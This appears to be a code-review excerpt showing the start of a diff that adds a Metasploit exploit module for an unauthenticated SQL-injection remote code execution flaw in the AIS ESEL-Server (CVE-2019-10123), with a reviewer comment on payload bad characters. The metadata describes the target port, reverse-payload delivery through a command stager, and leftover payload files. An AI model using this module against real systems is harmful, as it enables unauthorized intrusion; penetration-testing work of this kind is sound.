modules/exploits/windows/misc/ais_esel_server_rce.rb

```diff
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::MSSQL_COMMANDS
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
+      'Description'    => %q{
+        This module will execute an arbitrary payload on an "ESEL" server used by the
+        AIS logistic software. The server typically listens on port 5099 without TLS.
+        There could also be server listening on 5100 with TLS but the port 5099 is
+        usually always open.
+        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+        with the 'sa' user is in place.
+
+        This module was verified on version 67 but it should also run on lower versions.
+        An fixed version was created by AIS in September 2017. However most systems
+        have not been updated.
+
+        In regard to the payload, unless there is a closed port in the web server,
+        you dont want to use any "bind" payload. You want a "reverse" payload,
+        probably to your port 80 or to any other outbound port allowed on the firewall.
+
+        Currently, one delivery method is supported
+
+        This method takes advantage of the Command Stager subsystem. This allows using
+        various techniques, such as using a TFTP server, to send the executable. By default
+        the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+        NOTE: This module will leave a payload executable on the target system when the
+        attack is finished.
+
+      },
+      'Author'         =>
+        [
+          'Manuel Feifel'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-10123'],
+          ['URL', 'www.ais.de']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Payload'        =>
+        {
+          'BadChars'  => "\x00\xff",
```

Comment:
Presumably `\x27` is also a bad character due to injection within `'#{cmd}'` in `execute_command`.